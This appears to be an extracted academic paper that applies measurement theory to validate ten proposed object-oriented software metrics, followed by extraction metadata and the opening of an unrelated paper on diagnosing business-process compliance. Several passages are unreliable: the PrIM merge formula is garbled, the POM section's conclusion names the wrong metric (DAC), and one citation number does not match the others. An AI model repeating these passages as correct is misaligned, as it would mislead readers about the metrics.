There are two fundamental considerations in measurement theory: representation and uniqueness. The representation problem is to find sufficient conditions for the existence of a mapping from an observed system to a given mathematical system. The sufficient conditions, referred to as representation axioms, specify conditions under which measurement can be performed. The measurement is then stated as a representation theorem. Uniqueness theorems define the properties and valid processes of different measurement systems and tell us what type of scale results from the measurement system. The scale used dictates the meaningfulness of measures or metrics [8] [12] [14].
To explain the representation problem, suppose we observe that Tom is the tallest of a group of three people, Dick is the shortest of the three, and Harry is taller than Dick and shorter than Tom. A taller than relationship among the three people has been empirically established [5]. Any measurement taken of the height of these three people must result in numbers or symbols that preserve this relationship. If it is further observed that Tom is much taller than Dick, then this relationship must also be preserved by any measurement taken. That is, the numbers or symbols used to represent the heights of Tom and Dick must convey to the observer the fact that Tom is indeed much taller than Dick. If it is further observed that Dick towers over Tom when seated on Harry’s shoulders, then another relationship has been established which must also be preserved by any measurement taken. This relationship might be represented in the real number system by .7 Dick + .8 Harry > Tom. Any numbers that resulted from measuring the height of Tom, Dick, and Harry would have to satisfy the observation represented by our formula.
To illustrate the uniqueness problem, let us consider two statements: 1) This rock weighs twice as much as that rock; 2) This rock is twice as hot as that rock. The first statement seems to make sense but the second statement does not. The ratio of weights is the same regardless of the unit of measurement while the ratio of temperature depends on the unit of measurement. Weight is a ratio scale, therefore, regardless of whether the weights of the rocks are measured in grams or ounces the ratio of the two is a constant. Fahrenheit and Celsius temperatures are interval scales, i.e., they exhibit uniform distance between integer points but have no natural origin. Because Fahrenheit and Celsius are interval scales, the ratio of the temperatures of the rocks measured on the Fahrenheit scale is different from the ratio when the temperatures are measured on the Celsius scale. Statements, such as those above, are meaningful only if they are unique, i.e. if their truth is maintained even when the scale involved is replaced by another admissible scale.
Metrics may be valid with respect to ordinal scales only, or they may be valid with respect to interval or ratio scales. The ordinal scale allows comparisons of the type “entity A is greater than entity B” or “entity A is at least as great as entity B.” Rank order statistics and non-parametric statistics may be used with entities measured on an ordinal scale. The median is the most meaningful measure of centrality on an ordinal scale.
The interval scale allows the differences between measurements to be meaningful. Statements such as “the difference between A and B is greater than the difference between B and C” can be made about entities measured on an interval scale. When groups of entities are measured on the interval scale, parametric statistics as well as all statistics that apply to ordinal scales can be used, provided that the necessary probability distribution assumptions are being met. The arithmetic mean is the most powerful and meaningful measure of centrality.
Use of the *ratio scale* implies that the ratios of measurements are meaningful, as for example in measuring the density or volume of something. Statements such as “A is twice as complex as B” can be made about entities measured on the ratio scale. When groups of entities are measured on the ratio scale, percentage calculations as well as all statistics that apply to the interval scale can be used. The arithmetic mean is the most powerful and meaningful measure of centrality.
In order for a metric to be valid on an ordinal scale, it must be representative of the dimension under consideration (e.g. complexity or size) and it must satisfy the axioms of the weak order, i.e. completeness, transitivity, and reflexivity. In order for a metric to be valid on an interval or ratio scale, it must be valid on an ordinal scale and satisfy additional axioms. There are certain desirable properties that contribute toward the degree that a metric may be considered representative [15]. For example, a metric should satisfy intuition, i.e. it should make sense based upon the professional experience of the measurer. Entities that appear better in the dimension being measured (based on the observer’s experience) should score higher on the metric being used. Entities that appear similar should score roughly the same. Consistency is another important feature. The measurement must be such that very nearly the same score is achieved regardless of the measurer, and the order in which the entities appear, in relation to each other, must be consistent from measurement to measurement. Further, in order for the metric to be useful, there must be sufficient variation in the measurement of different entities.
Zuse [16] [17] evaluated metrics of software code using flowgraphs to describe the possible structures being measured. Zuse defined modifications to the flowgraphs to describe the properties of the metric. The value of each metric increased, decreased, or stayed the same for each modification. The relation between the value of the metric taken before the modification to the flowgraph and the value of the same metric taken after the modification to the flowgraph is the *partial property* of the modification for this metric. Before a metric can be considered valid with respect to a specific scale, sufficient *atomic modifications* must be defined to describe the changes that can affect the metric, the partial properties of the metric must be established, and these partial properties must satisfy common intuition. An atomic modification is defined as the smallest change that can be made to an entity being measured, which will change the result of the measurement. There may be multiple possible atomic modifications for a metric.
Determining what the relevant atomic modifications are for each metric is itself a task based on intuition. Validation here is not a mathematical proof, but rather comparable to validation of scientific theories. Once sufficient evidence is found to support a theory, and as long as no contrary evidence is found, a theory is accepted as valid. The possibility of later refutation is always a reality.
If no atomic modification is found to contradict the premise of the measure, the measure may be accepted as valid on the ordinal scale. In order to be accepted valid on the ratio scale, the measure must preserve size relationships under concatenation of entities, i.e. the concatenated entities must have a measure equal to the sum (or the union, depending on the type of entities) of the measures of the original entities [18].
**Newly Proposed Object-Oriented Software Metrics**
1. Potential Methods Inherited (PMI)
PMI is defined as the maximum count of methods that could potentially be invoked by a class. PMI is offered as an improvement to the Depth of the Inheritance Tree (DIT) metric of Chidamber and Kemerer [3], and the Number of Methods Inherited by a Subclass (NMI) metric of Lorenz and Kidd [10]. Both are proposed as measures of complexity. DIT is defined as zero for a class that has no super class, i.e. the root node of the inheritance tree, one for each of the root node's immediate subclasses, two for the subclasses of these subclasses, etc. NMI is defined as the number of methods inherited by a class, i.e. the count of methods in all super classes. PMI differs from NMI in that PMI also counts the methods that are defined in the class itself, i.e. are not inherited.
As an example, assume in Figure 1 below that class A has five methods, class B has four methods, and class C has six methods. The NMI for classes B and C would be 5, the PMI for class B would be 9, and the PMI for class C would be 11. NMI for the combined class B+C in Figure 2 would still be 5. The PMI for the combined class B+C would be 15.
To see problems with the validity of the DIT metric, consider the case where a class with subclasses is combined with a sibling class (Figures 1 and 2 below). No change in DIT takes place indicating equal complexity, even though the number of methods inherited has increased. Alternatively, consider the case where a class is combined with its super class, thereby reducing the DIT for all of its subclasses (Figures 3 and 4 below). The new DIT would indicate that complexity has been reduced, even though no change in the number of methods has taken place.
To see problems with the validity of the NMI metric, consider the case where two sibling classes are combined (Figures 1 and 2 below). The NMI for the new, combined class is the same as the NMI was for the sibling classes before the combination, indicating equal complexity, even though the new class may contain many more methods. This problem does not occur with the proposed PMI metric, as it counts the local methods as well.
To further validate PMI as a measure of complexity, consider Figure 1 and the atomic modification of adding or deleting a class at some lower level of the inheritance tree. If for example, a new class is added as a subclass of D, E, F, or G, it is clear that the PMI of the added class is higher than that of the parent class. This supports our intuitive assumption that complexity increases (decreases) as methods are added to (deleted from) an existing inheritance tree or hierarchy chart. Irrespective of where the new class is added (deleted), the PMI of the classes effected, i.e. those classes that are at some lower level of the path on which the added or deleted class lies, will increase (decrease).
Consider the atomic modification of combining two classes that are not children and not siblings of each other, e.g. combine B and G in Figure 1, to get Figure 5. The PMI for class F remains unchanged. The PMI of classes D, and E increases, as does the PMI of the combined class.
Finally, consider the atomic modification of combining a parent with its child class, as shown for example in Figures 3 and 4. The PMI of class F remains unchanged. The PMI of classes C and D increases.
As stated earlier, a measure can be used as an ordinal scale if the partial properties of the atomic modifications defined for that measure are acceptable and the axioms of the weak order hold. Thus, if the above examples pass the test of common sense and intuition, PMI can be accepted on the ordinal scale as a complexity measure of classes.
In order to validate PMI on the ratio scale, we need to show that PMI is additive under the concatenation patterns of object-oriented classes. Consider Figure 1 as a structure to which we wish to add Figure 6. Assume XYZ is inserted between A, B and C such that X is a subclass of A, B is a subclass of Y, and C is a subclass of Z. Let -old signify measurements taken before the merge, and let -new signify measurements taken after the merge. Since all methods in all classes along the path to the root node are counted, it is always the case that
\[
\begin{align*}
PMI_{D\text{-}new} &= PMI_{D\text{-}old} + PMI_{Y\text{-}old} \\
PMI_{E\text{-}new} &= PMI_{E\text{-}old} + PMI_{Y\text{-}old} \\
PMI_{F\text{-}new} &= PMI_{F\text{-}old} + PMI_{Z\text{-}old} \\
\text{and} \quad PMI_{G\text{-}new} &= PMI_{G\text{-}old} + PMI_{Z\text{-}old}.
\end{align*}
\]
In general, whenever concatenation takes place, the PMI of classes affected will increase by the number of methods in the classes that are being inserted within the path to the root node. Thus the PMI metric meets the measurement theory properties of the ratio scale.
2. Proportion of Methods Inherited by a Subclass (PMIS)
PMIS is offered as an improvement to the NMI metric of Lorenz and Kidd [10]. PMIS is a measure of the strength of subclassing by inheritance. PMIS ranges along the closed interval [0,1], and is calculated by dividing the NMI of the subclass by PMI of the subclass, i.e. the total number of methods in the path including the subclass (see previous section). Thus,
\[
PMIS = \frac{\text{NMI}}{\text{PMI}}.
\]
The partial properties of the metric are described by the atomic modifications of adding (subtracting) a method to the subclass being measured, and adding (subtracting) a method to a class along the path to the subclass being measured. As methods are added to (removed from) the subclass being measured, PMIS increases (decreases). As methods are added to (removed from) a super class of the subclass being measured, PMIS decreases (increases). If we accept that PMIS measures subclassing by specialization, then we can accept PMIS as an ordinal scale.
The measure PMIS can be parsed into two separate components. The dividend is the number of methods inherited by the subclass, and the divisor is the total number of methods available to the subclass. Both the dividend and the divisor are counts, which put them on the absolute scale. PMIS is the proportion of methods available to a subclass which are available through inheritance. Proportions are ratio scales [12]. Therefore, if we accept PMIS as a measure of specialization, PMIS can be accepted as a ratio scale.
3. **Density of Methodological Cohesiveness (DMC)**
DMC is proposed as an alternative to the *Lack of Cohesion in Methods (LCOM)* metric of Chidamber and Kemerer [3]. LCOM is calculated by looking at all possible pairs of methods within a class, and by counting those pairs with some common instance variables, and those pairs having zero common instance variables. LCOM is defined as the number of pairs with zero common instance variables, minus the number of pairs with some common instance variables, as long as this difference is non-negative, otherwise LCOM is taken to be zero. One problem with the LCOM metric is that a value of zero can mean anything between equal numbers of pairs with and without common instance variables, to all pairs having some common instance variables. The metric does not discriminate in these cases, and thus may be of little value.
DMC is defined as the number of pairs of methods that have some common instance variables within an object class, divided by the total number of pairs of methods in the class. DMC ranges along a continuum in the closed interval [0,1]. If \( S = \) the count of pairs of methods with some similarities, and if \( N = \) the total number of methods, then the total number of pairs of methods = \((N*(N-1))/2\), and \( \text{DMC} = S / ((N*(N-1))/2) = 2S/(N*(N-1)). \)
In order to describe the partial properties of DMC we apply the atomic modification of adding or deleting a method to the measured class. If the added method uses instance variables already being used in the class, DMC will increase in proportion to the number of methods already using the instance variables. If added methods use instance variables unique in the class, DMC will decrease in proportion to the number of methods added. This seems congruent to most users' understanding of inter-relatedness and thus their understanding of cohesiveness of methods. A measure can be used as an ordinal scale if the user accepts the partial properties of the atomic modifications defined for that measure and the axioms of the weak order hold. The axioms of the weak order hold and DMC can be accepted as an ordinal scale.
The measure DMC is the proportion of two counts, and proportions are ratio scales [12]. Therefore, if we can accept that the ratio of pairs of methods which have some common instance variables defines a measure of cohesiveness of methods within a class, DMC may be assigned to the ratio scale. Counting common instance variables within the method pairs would likely be an even better metric, but it would be harder and more costly to determine.
4. **Messages and Arguments (MAA)**
MAA undertakes to quantify the communication complexity of a method and is offered as an improvement to the *Number of Message-sends (NMS)* metric of Lorenz and Kidd [10]. Some messages require no arguments. These messages nevertheless add complexity to the method and must be accounted for in any metric which proposes to measure method complexity. Each argument required by a message adds additional complexity to the method and must likewise be accounted for in any metric which proposes to measure method complexity. MAA is a count of the number of message-sends in a method plus a count of the number of arguments in the messages. MAA ranges from 0 to $N$ where $N$ is a positive integer.
Let $|m|$ be the number of message-sends in a method, and let $|a_i|$ be the number of arguments in the $i^{th}$ message-send. Then
$$\text{MAA} = \sum |a_i| + |m|.$$
The metric is designed to measure a method. Methods are designed to fulfill certain purposes and certain functions must be called in order to meet this design. These message-sends are not likely to be moved from one method to another. The partial property of interest is the addition (deletion) of message-sends or function calls to a method. As function calls are added (deleted), the value of MAA increases (decreases). The user would agree that a method grows more (less) complex as function calls are added to (deleted from) the method. The user would also agree that function calls with arguments add more complexity than function calls without arguments and that the more arguments a function call has, the more complexity it adds. If that is the case, MAA can be assigned to the ordinal scale.
The formation of a class is accomplished through the concatenation of methods. Concatenation can be either sequential or alternative. The alternative form of concatenation would involve the inclusion of an “IF” statement in the class to determine whether a method would be instantiated at run time. The sequential form is used whenever all methods are to be instantiated without exception. Let $\{M\}$ be the set of methods concatenated to form a class and let $M_i$ be the $i^{th}$ method. Further, let $\text{MAA}_i$ be the MAA of method $M_i$ and let $\text{MAA}_{M}$ be the MAA of the set $\{M\}$. Since there are no message-sends included in the “IF” statements added in the alternate form of concatenation and because message-sends are not merged in the sequential form of concatenation, then, $\text{MAA}_M = \sum \text{MAA}_i$. This being the case, it follows that if MAA is a valid measure of method complexity on an ordinal scale, then MAA is valid on a ratio scale.
5. **Density of Abstract Classes (DAC)**
DAC is offered as a complement to the *Number of Abstract Classes (NAC)* metric of Lorenz and Kidd [1]. Abstract classes facilitate the reuse of methods and state data. Methods in abstract classes are not instantiated but rather are passed on to subclasses through inheritance. DAC is proposed as a measure of reuse through inheritance. DAC is the proportion of abstract classes in a project and ranges along the closed interval $[0,1]$.
Consider the hierarchy chart in Figure 1, where the nodes represent classes and subclasses, and the arcs represent inheritance. Assume that the main purpose of class C is to define a common
interface for classes F and G. Then class C cannot be instantiated and is known as an abstract class. Assuming that class C is the only abstract class in this program, then the DAC of this program is 1/7.
Since DAC is calculated solely from the classes within a program or project, the partial properties of the metric are described by (1) adding or subtracting an abstract class to the program or project, and by (2) adding or subtracting a class that is not an abstract class to the program or project. As abstract classes are added (subtracted), DAC increases (decreases). As classes that are not abstract classes are added (subtracted), DAC decreases (increases). If we accept the density of abstract classes as a measure of reusability through inheritance then DAC is a valid measure on an ordinal scale.
The measure DAC is a quotient where the dividend is the count of abstract classes and the divisor is the count of all classes. As counts, both the dividend and the divisor are absolute scales, and proportions of absolute scales are ratio scales [12]. Therefore, if we can accept that the count of abstract classes defines a measure of reuse through inheritance, DAC may be assigned to the ratio scale.
The advantage of DAC over NAC is that DAC allows us to compare programs of different sizes, as it measures a proportion rather than an absolute count.
6. Proportion of Overriding Methods in a Subclass (POM)
POM is the proportion of methods in a subclass that override methods from a superclass. POM ranges along the closed interval [0,1] and is proposed as an improvement to the Number of Methods Overwritten (NMO) metric of Lorenz and Kidd [10]. Lorenz and Kidd argue that subclasses should extend their superclasses, be specializations of the superclass, instead of overriding the methods of the superclasses. POM is offered as an inverse measure of specialization. A large POM may indicate a design problem.
Overriding methods in a subclass are those that have the same name as some methods in the superclass. Let |M| be the total number of methods in the subclass, and let |O| be the number of methods in the subclass that override methods in a superclass. Then
\[ POM = \frac{|O|}{|M|}. \]
The partial properties of POM are described by adding or subtracting overriding methods to or from the subclass. As overriding methods are added (subtracted), POM increases (decreases). If we accept the proportion of overriding methods as an inverse measure of specialization then POM is a valid measure on an ordinal scale. The metric POM is a quotient where the dividend is the count of methods in a subclass that override methods from a superclass, and the divisor is the count of all methods in the subclass. As counts, both the dividend and the divisor are absolute scales, and proportions of absolute scales are ratio scales [12]. Thus DAC is a valid measure on the ratio scale.
The advantage of POM over NMO is that POM allows us to compare programs of different sizes, as it measures a proportion rather than an absolute count.
7. **Unnecessary Coupling through Global Usage (UCGU)**
UCGU is offered as an improvement to the *Global Usage (GUS)* metric of Lorenz and Kidd [10]. Whereas GUS counts the number of global variables, including system variables that are global to the entire system, class variables that are global to the class, and pool directories which are global to any classes that include them, UCGU counts the number of times global variables are invoked. Assume $C_i$ is the number of class global variables in class $i$, $G_i$ is the number of system variables invoked in class $i$, and $P_i$ is the number of pool directories included in class $i$. Then
$$UCGU = \Sigma_i G_i + \Sigma_i C_i + \Sigma_i P_i.$$
The partial properties that define the measure are the addition or deletion of global variables, in their various guises, to the system. Since the instances of global variable usage are counted, adding or removing system global variables or pool directories without invoking them will not cause UCGU to change (though GUS would change). As class global variables are added (subtracted), UCGU increases (decreases). As system global variable or pool directory usage is added (subtracted), UCGU increases (decreases). If we accept UCGU as a measure of poor design and we also accept that the design deteriorates as global variables are added, then we can accept UCGU as a valid measure on an ordinal scale.
In order to establish UCGU as a ratio scale, we need to show that the measure UCGU is additive under the concatenation patterns of object-oriented classes. As an example, consider the hierarchy chart of Figure 1 as a structure to which we wish to add Figure 6. Clearly, if Figure 6 is inserted into Figure 1, the global variables in the two programs represented by the hierarchy charts are not affected. The instances of global variable usage are not affected by the merger of the two programs. UCGU of the merged program is equal to the addition of UCGU of the initial program and UCGU of the added program. Therefore UCGU can be accepted as a valid measure on the ratio scale.
8. **Degree of Coupling between Classes (DCBO)**
DCBO is offered as an improvement to the *Coupling between Object Classes (CBO)* metric of Chidamber and Kemerer [3]. According to Chidamber and Kemerer, excessive coupling among object classes can hinder reuse through the deterioration of modular design, and the greater the degree of coupling the more sensitivity to changes in other parts of the program. Whereas CBO is a count of other classes with which a specific class shares methods or instance variables, DCBO for a class is the count of methods utilized from other classes. DCBO ranges from 0 to $N$, where $N$ is a positive integer. DCBO represents the outside-the-class methods utilization for the class being measured. If a class is entirely self-contained, the DCBO for that class is zero.
In order to describe the partial properties of DCBO we apply the following atomic modifications:
- a) addition (deletion) of a method to the measured class which calls a method which resides in a different class,
- b) addition (deletion) of a method to another class and the addition (deletion) of a call to the method from the measured class,
c) movement of a method from the class where it resides to the measured class which uses the method.
Consider Figure 1 and atomic modification a. If a new call to a method which resides in class E is added to class D, it is clear that DCBO of class D increases. The user would generally agree that inter-object complexity increases (decreases) as inter-object coupling is added to (deleted from) an existing hierarchy chart. DCBO would seem to meet that criterion.
If atomic modification b is applied to Figure 1 by adding a new method to class E and calling the new method from class D, it is clear that DCBO of class D increases. The user would generally agree that inter-object complexity increases (decreases) as coupling is added to (deleted from) an existing hierarchy chart. Again, DCBO would seem to meet that criterion.
If a method which resides in class E is moved to class D, i.e., the application of atomic modification c, and it is assumed that both classes need access to the method, it is clear that the DCBO of class E increases while the DCBO of class D decreases. The user would generally agree that while the over-all complexity has neither increased nor decreased the complexity of both D and E has changed.
Thus DCBO appears to be a valid measure on the ordinal scale. In order to establish DCBO as a ratio scale, we need to show that DCBO is additive under the concatenation patterns of object-oriented classes. Since DCBO is a measure of one aspect of a class’s complexity, the concatenation pattern of interest is the merger of two classes. DCBO of class D+E is equal to DCBO_D+DCBO_E-\lambda_{DE}-\lambda_{ED}, where \lambda_{DE} is the number of methods in D called by E, and \lambda_{ED} is the number of methods in E called by D.
Because we are measuring the interaction between two classes, the merging of these classes changes the fundamental relationship of the methods within each to the methods in the other, i.e., what was interclass communication before the merge becomes intraclass communication after the merge. Total communication has remained the same but the fundamental relationships have changed. Let us define a conservation of communication: The merging of two classes does not change the amount of communication taking place, i.e., the number of methods calling other methods. However, the perspective of the communication in relation to object boundaries changes from interclass communication to intraclass communication whenever the merged classes utilize the methods of each other. The exact opposite effect takes place when a class is split into multiple classes.
Let us further define DCWO as the Degree of Coupling within a Class, i.e., the number of methods utilized within the class. Then, total communication for some predefined system is equal to DCBO + DCWO = \kappa, where \kappa is a constant for the system in question. Thus, if two classes are merged (or a class is split into two), \kappa = DCBO_{old} + DCWO_{old} = DCBO_{new} + DCWO_{new}. DCBO/\kappa satisfies the requirements of the ratio scale.
9. Number of Private Instance Methods (PrIM)
PrIM is offered as a measure of information hiding by a class. The PrIM for a class is the count of the number of methods within the measured class which are declared to be private. These are the methods that cannot be called by other classes. Because the private methods are hidden to
other classes, this count is said to represent the amount of information hidden from the calling classes. PrIM ranges from 0 to N, where N is a positive integer.
In order to describe the partial properties of PrIM consider the addition (deletion) of a method to the measured class, which is declared as private and therefore cannot be called by another class. The PrIM of the measured class increases (decreases). It seems reasonable that the amount of information a class hides from other classes increases (decreases) as private methods are added to (deleted from) the class. A measure can be used as an ordinal scale if the measurer accepts the partial properties of the atomic modifications defined for that measure and the axioms of the weak order hold. The axioms of the weak order hold and the acceptance of PrIM as an ordinal scale seems clear.
In order to establish PrIM as a ratio scale, we need to show that PrIM is additive under the concatenation patterns of object-oriented classes. Since PrIM is a measure of the information hidden by a class, the required concatenation pattern would be to merge two classes and recalculate PrIM. Private methods are those methods that cannot be called by other classes. Consider Figure 1. The PrIM of class B+E is equal to PriMs + PRIME - 2, where _ is the number of private methods that B and C hold in common, i.e., _ is the intersection of the methods of classes B and C. This is the equivalent to the union of two sets. Thus PrIM can be used as a ratio scale.
10. **Strings of Message Links (SML)**
SML is proposed as a measure of error-detection complexity. It is offered as an improvement to the Strings of Message-sends (SMS) metric of Lorenz and Kidd [10]. Whereas SMS is defined as the number of linked messages, SML is defined as the count of intermediate results that linked messages generate to feed to each succeeding message. The message linking form of coding makes intelligent error recovery more difficult. SML ranges from 0 to N, where N is a positive integer.
As an example, consider the Smalltalk command “myAccount balance print”, which causes four messages to be strung together with no chance of detecting invalid intermediate results. SML is calculated by counting the potential nil and false conditions that are not accounted for in the code. SML for this example is three.
The expanded code is explained in the following diagram:
```smalltalk
self account balance printTo Transcript
```
First, the message `account` is passed to `self`. This message states that the portion of `self` that represents an account is to be used. `anAccount` is returned from this operation, or nil if the account is nonexistent. A nil value results in a run-time error.
```smalltalk
anAccount balance (or nil)
```
Second, the message `balance` is sent to `anAccount` (the result of the previous message). The result of this operation is a `Float`, or the account balance may be nil. A nil value again results in a run-time error.
aFloat printToTranscript (or nil)
Third, the message printToTranscript is sent to the object aFloat (the result of the previous message). This results in the balance portion of the account being formatted as a string, or false if the balance came back as another format, say as integer.
aString (or false)
Fourth, is the resulting string from the printToTranscript operation.
The partial property description of this measure is the addition (deletion) of message-sends to (from) the nested message structure. As statements are added to (deleted from) the nested structure, the value of SML increases (decreases), which is in compliance with the measurer’s reasonable expectation. Thus, SML can be assigned to the ordinal scale.
Consider the merging or splitting of nested message-sends. If the above example of a Smalltalk command were split into two message-send statements, SML for each string would be one, and the total SML would be two. In general, merging two nested strings will result in an SML measure equal to the sum of the SMLs of the two nested strings, plus one. Further, in the above example, if we split the original command into four one message-send statements, the SML for each string becomes zero, and thus the total SML becomes Zero. Because SML is a count, possesses a natural zero, and has no transformations, SML appears to be a valid measure not only on the ratio scale, but on an absolute scale.
Conclusion
Validity may depend on the use to which the measure is to be applied. If one is looking for “red light” indicators that something may be wrong or that something may require extra attention to assure that nothing does go wrong, then an ordinal scale may be all that is required. These “red light” indicators help find abnormal conditions. Finding outliers seems to be the state-of-the-art at this time. However, to truly understand software and the software development process, we need to get a better grip on software measurement.
At a minimum, measures must be validated before they are placed in use. Not every metric that has been proposed in the literature states the dimension that it proposes to measure. However, validation of a metric requires the identification of this dimension. Thus, the very act of validating the measures will help define the many dimensions of object-oriented software.
References
|
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19980018144.pdf", "len_cl100k_base": 8715, "olmocr-version": "0.1.50", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 37628, "total-output-tokens": 10290, "length": "2e13", "weborganizer": {"__label__adult": 0.00030159950256347656, "__label__art_design": 0.00024330615997314453, "__label__crime_law": 0.0002834796905517578, "__label__education_jobs": 0.0006399154663085938, "__label__entertainment": 4.166364669799805e-05, "__label__fashion_beauty": 0.00011807680130004884, "__label__finance_business": 0.00018084049224853516, "__label__food_dining": 0.0002636909484863281, "__label__games": 0.0003879070281982422, "__label__hardware": 0.0004448890686035156, "__label__health": 0.0003349781036376953, "__label__history": 0.0001704692840576172, "__label__home_hobbies": 6.908178329467773e-05, "__label__industrial": 0.00023055076599121096, "__label__literature": 0.0002617835998535156, "__label__politics": 0.00020802021026611328, "__label__religion": 0.0002970695495605469, "__label__science_tech": 0.005458831787109375, "__label__social_life": 8.0108642578125e-05, "__label__software": 0.0042266845703125, "__label__software_dev": 0.98486328125, "__label__sports_fitness": 0.0002187490463256836, "__label__transportation": 0.00033354759216308594, "__label__travel": 0.00014281272888183594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43830, 0.01636]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43830, 0.84426]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43830, 0.93285]], "google_gemma-3-12b-it_contains_pii": [[0, 117, false], [117, 801, null], [801, 2928, null], [2928, 6427, null], [6427, 10272, null], [10272, 13946, null], [13946, 16056, null], [16056, 17046, null], [17046, 19742, null], [19742, 22864, null], [22864, 26217, null], [26217, 29269, null], [29269, 32511, null], [32511, 35912, null], [35912, 38907, null], [38907, 41251, null], [41251, 43402, null], [43402, 43830, null]], "google_gemma-3-12b-it_is_public_document": [[0, 117, true], [117, 801, null], [801, 2928, null], [2928, 6427, null], [6427, 10272, null], [10272, 13946, null], [13946, 16056, null], [16056, 17046, null], [17046, 19742, null], [19742, 22864, null], [22864, 26217, null], [26217, 29269, null], [29269, 32511, null], [32511, 35912, null], [35912, 38907, null], [38907, 41251, null], [41251, 43402, null], [43402, 43830, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43830, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43830, null]], "pdf_page_numbers": [[0, 117, 1], [117, 801, 2], [801, 2928, 3], [2928, 6427, 4], [6427, 10272, 5], [10272, 13946, 6], [13946, 16056, 7], [16056, 17046, 8], [17046, 19742, 9], [19742, 22864, 10], [22864, 26217, 11], [26217, 29269, 12], [29269, 32511, 13], [32511, 35912, 14], [35912, 38907, 15], [38907, 41251, 16], [41251, 43402, 17], [43402, 43830, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43830, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
80d1145bd59ecac5f7550849fc3a0b7fdc7c5ed5
|
Explaining the Incorrect Temporal Events During Business Process Monitoring by means of Compliance Rules and Model-based Diagnosis
María Teresa Gómez-López and Rafael M. Gasca
Department of Computer Languages and Systems
University of Seville
Seville, Spain
{maytegomez, gasca}@us.es
Stefanie Rinderle-Ma
University of Vienna
Faculty of Computer Science
stefanie.rinderle-ma@univie.ac.at
Abstract—Sometimes the business process model is not known completely, but a set of compliance rules can be used to describe the ordering and temporal relations between activities, incompatibilities, and existence dependencies in the process. The analysis of these compliance rules and the temporal events thrown during the execution of an instance, can be used to detect and diagnose a process behaviour that does not satisfy the expected behaviour. We propose to combine model-based diagnosis and constraint programming for the compliance violation analysis. This combination facilitates the diagnosis of discrepancies between the compliance rules and the events that the process generates as well as enables us to propose correct event time intervals to satisfy the compliance rules.
Keywords—Business Process Compliance, Compliance Rules, Event Analysis, Constraint Programming, Model-based Diagnosis
I. INTRODUCTION
A business process consists of a set of activities that are performed in coordination within an organizational and technical environment [1]. The base of Business Process Management Systems (BPMS) is the explicit representation of business processes with their activities and the execution constraints between them. Sometimes, the description of the model is not known completely, but some parts of the behaviour of the process can be known and represented by means of compliance rules in a declarative way. These compliance rules describe the ordering and temporal relations between activities as well as incompatibilities and existence dependencies in a business process [2], [3], [4], [5]. In case the process model is not available at all or only partly known, compliance of running process instances has to be monitored during runtime [6]. The monitoring of the process can be carried out by means of the temporal events (henceforth events) that describe the execution of the activities of the process. In particular, if the activities are performed by persons or software not integrated in a BPMS that assures a correct order execution, it is possible that the activities are not executed according to the compliance rules. Previous works focused on the detection of compliance violations by monitoring [6]. Our proposal is centered not only in the detection and diagnosis, but also in the proposal of the correct intervals where the events should have been executed. Thereby, our proposal assumes that all the compliance rules are correct and the set of events analyzed represents all the activities executed in a period of time. A compliance rule violation, i.e., a fault in the process execution, is caused by so called incorrect events. By using the term incorrect event we do not imply that the event itself is incorrect, i.e., the associated activity execution, but the time instant when the event occurred was not in accordance with the imposed compliance rules.
Our proposal uses model-based diagnosis theory, that permits to discover the event responsible of a malfunction comparing the model that describes the system (expected behaviour) with the observational model (observed behaviour). Classic model-based diagnosis needs to be adapted to diagnose compliance rules for multiple process instances, since the same data can be involved in different instances at the same time. Also, it is necessary to establish the part of the model that can explain the incorrect behaviour, and the associated events in the compliance rule scenario. Examples of compliance rules that can be used in a diagnosis process are:
- \( c_1 \): If activity \( A \) is executed followed by an execution of activity \( B \), activity \( C \) must be executed eventually.
- \( c_2 \): If activity \( B \) is not executed, activity \( C \) must be executed.
- \( c_3 \): If activity \( C \) is executed, activity \( D \) must be executed eventually.
- \( c_4 \): Every activity can only be executed once in each process instance.
Consider the following sequence of events monitored as observational model:
\{\text{Start\_Process, Event}_a, \text{Event}_d, \text{Event}_b, \text{Event}_c\}.
Compliance rule \( c_3 \) (in connection with \( c_4 \)) is violated, since \( \text{Event}_d \) was not executed after \( \text{Event}_c \) but before. Although this compliance violation can only be detected after \( \text{Event}_c \) has occurred, this instant is not the root...
cause for the violation, but the instant of Event_d that has occurred before. Our proposal enables the evaluation of the actual culprit of the malfunction, finding out the minimum modification that the instance must suffer to be in accordance with the compliance rules again.
Moreover, by using model-based diagnosis, it is also possible to determine non-compliances even before the rules are violated or activated. Take the following trace of events:
\{Start\_Process, Event_a, Event_d\}
Although neither compliance rule has been violated yet\(^1\), we can assure that not any occurrence of Event_c or Event_d exists that does not lead to a violation of compliance rules c_1 to c_4. If Event_b is executed or not, Event_c has to be executed before. This is never possible since Event_d has been already executed and cannot be executed again (c_4). The model-based diagnosis process proposed in this paper informs about the responsible of the malfunction, and how to solve this malfunction, for the example: execute C before D. This constitutes a novel pro-active detection and follow-up treatment of compliance violations before they actually occur.
Altogether, we have centered our proposal on three contributions:
- Detecting violations of compliance rules during runtime using events for multiple instances, enabling proactive treatment of future violations.
